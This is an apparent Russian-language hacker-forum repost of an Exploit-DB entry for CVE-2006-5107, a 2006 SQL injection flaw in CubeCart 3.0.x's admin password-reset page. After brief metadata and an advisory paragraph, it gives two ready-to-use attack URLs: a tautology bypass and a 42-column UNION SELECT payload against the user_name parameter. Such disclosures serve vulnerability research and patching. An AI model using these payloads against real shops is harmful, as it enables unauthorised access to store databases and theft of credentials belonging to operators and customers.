Exploit CubeCart 3.0.x - '/admin/forgot_pass.php?user_name' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28695
Проверка EDB
  1. Пройдено
Автор
HACKERS PAL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5107
Дата публикации
2006-09-26
Код:
source: https://www.securityfocus.com/bid/20215/info

CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
 
Источник
www.exploit-db.com

Похожие темы